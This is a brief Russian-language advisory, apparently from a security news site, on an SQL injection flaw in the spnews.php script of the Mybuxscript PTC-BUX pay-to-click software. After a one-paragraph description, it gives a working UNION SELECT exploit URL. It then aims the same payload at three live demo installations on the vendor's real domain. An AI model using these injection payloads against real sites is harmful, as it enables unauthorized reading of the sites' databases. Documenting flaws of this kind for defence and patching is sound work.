Программа: Mybuxscript PTC-BUX

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных сценарием spnews.php. Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.

Эксплоит:

http://localhost/Path/?p=spnews&id=-7+UNION+SELECT+1,version(),3,4—

Демонстрация:

http://mybuxscript.com/salescripts/ptc_basic/?p=spnews&id=-7+UNION+SELECT+1,version(),3,4—

http://mybuxscript.com/salescripts/ptc_advance/?p=spnews&id=-10+UNION+SELECT+1,version(),3,4—

http://mybuxscript.com/salescripts/ptc_professional/?p=spnews&id=-12+UNION+SELECT+1,version(),3,4—
 



Оставить мнение